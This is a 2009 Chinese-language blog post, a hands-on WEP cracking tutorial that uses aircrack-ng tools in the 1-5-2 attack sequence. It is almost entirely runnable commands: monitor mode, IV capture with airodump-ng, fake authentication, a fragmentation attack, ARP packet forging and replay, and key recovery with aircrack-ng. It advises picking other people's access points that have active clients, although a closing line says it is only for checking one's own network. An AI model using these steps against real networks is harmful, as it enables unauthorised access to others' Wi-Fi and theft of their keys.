2009年10月30日 星期五

wep實戰教程-有client的破解法 (1-5-2攻擊模式)

以下請以root身分進行.

一,開第一個terminal (瞭解目前網路環境)
1.執行ifconfig -a
a.可看到自己的網卡為wan0

2.用minidwep查看目前網路
a.執行了minidwep就自己會進入監控模式,故不必再執行airmon-ng了.這時的監控序號為mon0.
(若再執行一次minidwep,則監控序號會加一,為mon1)
b.scan完之後,可以看到自己的mac,再找其它的ap,最好是找有client的,編碼是wep,wpa則不適用

二,開第二個terminal (監控特定AccessPoint流量)
1.執行airodump-ng --ivs --essid [APmac] --channel [CHno] -w [filename] mon0
a.開始抓取第0監控序號(mon0),第[CHno]頻道,服務id為[APmac]的ivs包,寫入檔案[filename]
b.AP所屬的頻道號碼(CHno)可在第一個terminal找到,filename自訂即可

三,開第三個terminal (進行攻擊-attack)
1.export MAC=[自己的網卡] (請去第一個terminal複製,來此貼上)
2.export AP=[APmac] (請去第一個terminal複製,來此貼上)
-----------------------
3.aireplay-ng -1 0 -e [APname] -a $AP -h $MAC mon0
a.採取第一號攻擊.
b.若成功,會出現"association successful :-)"
-----------------------
4.aireplay-ng -5 -b $AP -h $MAC mon0
a.採取第五號攻擊
b.畫面出現:use this package? y
c.等待一會,若成功,會產生一個fragment-xxxx-xxxxxx.xor檔.
d.若不成,則會繼續讀取資料,再問use this package? 多試幾次,直到成功為止. 若太久都不成功,則可能client已下線了.此法就宣告失敗.
-----------------------
5.packetforge-ng -0 -a $AP -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx-xxxxxx.xor -w [ARPfilename]
a.利用xor檔產生arp檔.arp檔名[ARPfilename]請自訂.
b.若成功,顯示:wrote packet to: [ARPfilename]
-----------------------
6.aireplay-ng -2 -r [ARPfilename] -x 1024 mon0
a.採取第二號攻擊
b.use this packet? y
c.這時可查看第二個terminal,Data數會迅速增加. 當data達20000以上時,可嘗試進入下面的破解程序.

四,開第四個terminal (進行破解-crack)
1.執行aircrack-ng -n 64 -b [APmac] *.ivs
a.[APmac]請從第一個terminal複製
b.找出金鑰了,會顯示: key found [xx:xx:xx:xx:xx]
c.若沒找到,等第二個terminal中的data值大一些,再行破解看看.
d.實際用法,是將xx:xx:xx:xx:xx去掉冒號,改成xxxxxxxxxx即可

五,此文僅提供對自己的網路安全進行檢測之用,要懂得如何破解自己的密碼,才算是真地知道如何防範自己的密碼被破.

沒有留言:

張貼留言